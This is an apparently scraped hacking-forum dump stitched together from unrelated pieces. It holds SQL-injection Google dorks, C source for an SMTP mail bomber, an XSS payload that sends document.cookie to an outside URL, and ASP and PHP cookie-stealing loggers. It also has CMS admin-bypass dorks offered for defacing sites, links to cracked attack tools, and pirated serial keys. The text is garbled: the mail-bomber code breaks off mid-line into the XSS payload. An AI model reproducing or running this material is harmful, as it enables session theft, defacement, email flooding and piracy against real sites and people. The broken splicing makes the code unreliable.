Google dorks sql injection:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:Play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:Page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:Product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:Preview.php?id=
inurl:loadpsb.php?id=
inurl:Opinions.php?id=
inurl:spr.php?id=
inurl:Pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:Participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:Prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:Person.php?id=
inurl:Productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:Profile_view.php?id=
inurl:category.php?id=
inurl:Publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:Prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:Product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:Produit.php?id=
inurl:Pop.php?id=
inurl:shopping.php?id=
inurl:Productdetail.php?id=
inurl:Post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:Page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:Product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:Product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:Opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:Offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
.:-[ This is a M3x and Shp Mail bomber }-:.
disclaimer: Me (M3x and Shp are not liable or responcible with watever shit you get yourself into
this file is for everyone, plz make sure to keep the recognition to its creators. this is the only copy of this, if you want to make any adjustments to this plz message me at tjmax007[at]hotmail[dot]com
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT_SMTP 25
typedef struct socketClient_s {
int socket;
struct sockaddr_in to;
} socketClient_t;
void syntax(char *nameProgram);
int fetchArguments(int argc, char *argv[], char *host[], char *to[], char *messageFileName[], char *subject[], char *from[], char *port[], char *messagesNumber[]);
void freeArguments(char *host, char *to, char *messageFileName, char *subject, char *from, char *port, char *messagesNumber);
int socketConfiguration(socketClient_t *client, char *host, char *port);
int spamming(socketClient_t *client, char *to, char *messageFileName, char *subject, char *from, char *port, char *messagesNumber);
void readAscii(char *buffer);
int socketClientRead(socketClient_t *client, char *answer, int taille);
void socketClientFree(socketClient_t *client);
int main(int argc, char *argv[]) {
char *host = NULL;
char *to = NULL;
char *messageFileName = NULL;
char *subject = NULL;
char *from = NULL;
char *port = NULL;
char *messagesNumber = NULL;
socketClient_t *client = NULL;
if(argc < 4)
syntax(argv[0]);
if(fetchArguments(argc,argv,&host,&to,&messageFileName,&subject,&from,&port,&messagesNumber) == -1) { // mallocs
fprintf(stderr,"[-]Problem while fetchArguments()\n");
return EXIT_FAILURE;
}
printf("[+]Welcome on shp's mailbomber\n");
client = (socketClient_t *) malloc(sizeof(socketClient_t));
if(!client) {
fprintf(stderr,"[-]Problem while malloc()\n");
return -1;
}
if(socketConfiguration(client,host,port) == -1) {
fprintf(stderr,"[-]Problem while socketConfiguration()\n");
socketClientFree(client);
return -1;
}
if(spamming(client,to,messageFileName,subject,from,port,messagesNumber) == -1) {
fprintf(stderr,"[-]Problem while spamming()\n");
return -1;
}
socketClientFree(client);
freeArguments(host,to,messageFileName,subject,from,port,messagesNumber);
return EXIT_SUCCESS;
}
void syntax(char *nameProgram) {
/* We display this function if the syntax is not correct */
printf("[+]Usage: %s [host] [to] [messageFileName] [options]\n",nameProgram);
printf("[+]\thost => Name of the smtp server to use\n");
printf("[+]\tto => target email adress\n");
printf("[+]\tmessageFileName => the name of the file which contains the mail message\n");
printf("[+]Options:\n");
printf("[+]\t-f [From] => Specify the sender\n");
printf("[+]\t-h [Help] => Display this menu\n");
printf("[+]\t-n [Messages Number] => Number of mails to send (1 by default)\n");
printf("[+]\t-p [Port] => Specify the smtp server port (25 by default)\n");
printf("[+]\t-s [Subject] => Specify the subject of the mail\n");
printf("[+]Example: %s smtp.tapz.org target@hotmail.com message.txt -n 9999 -s Important -f hacker@jabber.org\n",nameProgram);
exit(EXIT_FAILURE);
}
int fetchArguments(int argc, char *argv[], char *host[], char *to[], char *messageFileName[], char *subject[], char *from[], char *port[], char *messagesNumber[]) {
/* This function is going to fetch arguments of the program */
int i;
int lenArgv;
/* Fetching "Host" */
lenArgv = strlen(argv[1]);
if(lenArgv > 29) { // Max-length for this array is 30
fprintf(stderr,"[-]First Argument (host) is too long\n");
return -1;
}
else {
*host = (char *) malloc((lenArgv +1) * sizeof(char));
if(!*host) {
fprintf(stderr,"[-]Problem while malloc()\n");
return -1;
}
}
strncpy(*host,argv[1],lenArgv);
host[0][lenArgv + 1] = '\0';
/* Fetching "To" */
lenArgv = strlen(argv[2]);
if(lenArgv > 29) { // Max-length for this array is 30
fprintf(stderr,"[-]Second Argument (to) is too long\n");
return -1;
}
else {
*to = (char *) malloc((lenArgv + 1) * sizeof(char));
if(!*to) {
fprintf(stderr,"[-]Problem while malloc()\n");
return -1;
}
}
strncpy(*to,argv[2],lenArgv);
to[0][lenArgv + 1] = '\0';
/* Fetching "MessageFile" */
lenArgv = strlen(argv[3]);
if(lenArgv > 29) { // Max-length for this array is 30
fprintf(stderr,"[-]Third Argument (MessageFile) is too long\n");
return -1;
}
else {
*messageFileName = (char *)malloc((lenArgv + 1) * sizeof(char));
if(!*messageFileName) {
fprintf(stderr,"[-]Problem while malloc()\n");
return -1;
}
}
strncpy(*messageFileName,argv[3],lenArgv);
messageFileName[0][lenArgv + 1] = '\0';
/* Fetching optinal arguments */
for(i=1;i
if(strcmp(argv[i],"-n") == 0) {
lenArgv = strlen(argv[i+1]);
if(lenArgv > 5) {
fprintf(stderr,"[-]Messages Number is too long\n");
return -1;
}
else {
*messagesNumber = (char *) malloc((lenArgv + 1) * sizeof(char));
if(!*messagesNumber) {
fprintf(stderr,"[-]Problem while malloc()\n");
return -1;
}
}
strncpy(*messagesNumber,argv[i+1],lenArgv);
messagesNumber[0][lenArgv + 1] = '\0';
}
if(strcmp(argv[i],"-s") == 0) {
lenArgv = strlen(argv[i+1]);
if(lenArgv > 19) {
fprintf(stderr,"[-]Subject is too long\n");
return -1;
}
else {
*subject = (char *) malloc((lenArgv + 1) * sizeof(char));
if(!*subject) {
fprintf(stderr,"[-]Problem while malloc()\n");
return -1;
}
}
strncpy(*subject,argv[i+1],lenArgv);
subject[0][lenArgv + 1] = '\0';
}
if(strcmp(argv[i],"-f") == 0) {
lenArgv = strlen(argv[i+1]);
if(lenArgv > 29) {
fprintf(stderr,"[-]From is too long\n");
return -1;
}
else {
*from = (char *) malloc((lenArgv + 1) * sizeof(char));
if(!*from) {
fprintf(stderr,"[-]Problem while malloc()\n");
return -1;
}
}
strncpy(*from,argv[i+1],lenArgv);
from[0][lenArgv + 1] = '\0';
}
if(strcmp(argv[i],"-p") == 0) {
lenArgv = strlen(argv[i+1]);
if(lenArgv > 5) {
fprintf(stderr,"[-]Port is too long\n");
return -1;
}
else {
*port = (char *) malloc((lenArgv + 1) * sizeof(char));
if(!*port) {
fprintf(stderr,"[-]Problem while malloc()\n");
return -1;
}
}
strncpy(*port,argv[i+1],lenArgv);
port[0][lenArgv + 1] = '\0';
}
if(strcmp(argv[i],"-h") == 0)
syntax(argv[0]);
}
return 0;
}
void freeArguments(char *host, char *to, char *messageFileName, char *subject, char *from, char *port, char *messagesNumber) {
/* This function frees arguments mallocs */
if(host)
free(host);
if(to)
free(to);
if(messageFileName)
free(messageFileName);
if(subject)
free(subject);
if(from)
free(from);
if(port)
free(port);
if(messagesNumber)
free(messagesNumber);
}
int socketConfiguration(socketClient_t *client, char *host, char *port) {
/* This function configurate the client socket */
struct hostent *hostInfo = NULL;
int ret;
char *ip = NULL;
client->socket = socket(AF_INET,SOCK_STREAM,0);
client->to.sin_family = AF_INET;
if(!port)
client->to.sin_port = htons(PORT_SMTP);
else {
char *check = NULL;
client->to.sin_port = htons(strtol(port,&check,0));
if(*check != '\0') {
fprintf(stderr,"[-]Bad port\n");
return -1;
}
}
hostInfo = gethostbyname(host);
if(!hostInfo) {
fprintf(stderr,"[-]Problem while gethostbyname()\n");
return -1;
}
ip = inet_ntoa(*(struct in_addr *)(hostInfo->h_addr_list[0]));
client->to.sin_addr.s_addr = inet_addr(ip);
ret = connect(client->socket,(struct sockaddr *)&client->to,sizeof(client->to));
if(ret == -1) {
fprintf(stderr,"[-]Problem while connect()\n");
return -1;
}
return 0;
}
int spamming(socketClient_t *client, char *to, char *messageFileName, char *subject, char *from, char *port, char *messagesNumber) {
/* This function is gonna mailbomb the target */
char answer[100];
int j;
int i;
int ret;
char *mailFrom = NULL;
char *rcptTo = NULL;
FILE* messageFile = NULL;
char *message = NULL;
char *ptr = NULL;
int number;
char *check = NULL;
int lenSubject;
if(!messagesNumber)
number = 1;
else {
number = strtol(messagesNumber,&check,0);
if(*check != '\0') {
fprintf(stderr,"Bad messages number format\n");
return -1;
}
}
/* Home Message */
if(socketClientRead(client,answer,100) == -1)
return -1;
printf("%s\n",answer);
/* EHLO */
ret = send(client->socket,"EHLO tapz\r\n",11,0);
if(ret == -1) {
fprintf(stderr,"[-]Problem while send()\n");
return -1;
}
if(socketClientRead(client,answer,100) == -1)
return -1;
readAscii(answer);
if(socketClientRead(client,answer,100) == -1)
return -1;
for(j=1;j<=number;j++) {
/* MAIL FROM */
if(from)
mailFrom = (char *) malloc((strlen(from) + 1 + 21) * sizeof(char));
else
mailFrom = (char *) malloc(34 * sizeof(char));
if(!mailFrom) {
fprintf(stderr,"[-]Problem while malloc()\n");
return -1;
}
if(from)
snprintf(mailFrom,strlen(from) + 21,"MAIL FROM: script>document.write('<img src="http://url/news.asp?msg='+document.cookie+'" width=0 height=0 border=0 />');</script>
news.asp:
<%
msg=Request.ServerVariables("QUERY_STRING")
testfile=Server.MapPath("cook.txt")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.Writeline(""&msg& "")
thisfile.close
set fs = nothing
%>
<%
msg=Request.ServerVariables("QUERY_STRING")
testfile=Server.MapPath("cook.txt")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.Writeline(""&msg& "")
thisfile.close
set fs = nothing
%>
PHP:
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$time=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cook.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$time. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$time=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cook.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$time. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>
http://www.multiupload.com/1GOVXOQKF6
http://hotfile.com/dl/43882237/91a2f8d/Pangolin_professinal_edition3.0.0.1016_amp_keyen.rar.html
http://www.zshare.net/download/76323277a3cf14a0/
http://www.badongo.com/file/22785978
http://uploading.com/files/47981f24/Pangolin_professinal_edition3.0.0.1016_amp_keyen.rar/
http://www.2shared.com/file/nPoQ9PDF/Pangolin_professinal_edition30.html
http://www.megaupload.com/?d=XHNZTOUJ
图片:3.0.0.1016.jpg  |
CMS - ("Content Management System ") - 0wn3d by PoisonCode
hola gente hoy me puse a hacer busquedas avanzadas con google para acceder a algunos paneles de administracion de el CMS ("Content Management System") por medio de la web la cual accedemos al panel de administracion sin ingresar User y Password de admin podemos editar la web y encontre unas cuantas aqui les dejo dorks para que deface algunas webs.
Dorks: allinurl: /admin/menu.php?id=
allinurl: /cms/admin/index.php?id=
allinurl: /admin/editar.php?id=
New SQL Injection Dorks
allinurl: \"index php go buy\"
allinurl: \"index.php?go=sell\"
allinurl: \"index php go linkdir\"
allinurl: \"index.php?go=resource_center\"
allinurl: \"resource_center.html\"
allinurl: \"index.php?go=properties\"
allinurl: \"index.php?go=register\"
allinurl: \"index.php?go=sell\"
allinurl: \"index php go linkdir\"
allinurl: \"index.php?go=resource_center\"
allinurl: \"resource_center.html\"
allinurl: \"index.php?go=properties\"
allinurl: \"index.php?go=register\"
* Crawler(Site Directories And Files);
* Vulnerability Scanner(SQL Injection, Cross Site Scripting);
* POC(Proof of Concept): SQL Injection and Cross Site Scripting;
* GET/Post/Cookie Injection;
* SQL Server: PlainText/FieldEcho(Union)/Blind Injection;
* MySQL/Oracle/DB2/Access: FieldEcho(Union)/Blind Injection;
* Administration Entrance Search;
* Password Hash of SQL Server/MySQL/Oracle Administrator;
* Time Delay For Search Injection;
* Auto Get Cookie From Web Browser For Authentication;
* Multi-Thread;
* Adcanced:Proxy,Escape Filter;
* Report Output.
Username: WWW
Serial : 3E08-3C1B-CAFB-321F
Username:st0p.org
Serial :9EF6-CC8C-F068-B1D6
Bayram hediyesi.
http://rs348.rapidshare.com/files/382664449/WebCruiserEnt.rar
UserGuide
Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Quisque sed felis. Aliquam sit amet felis. Mauris sem
Entradas
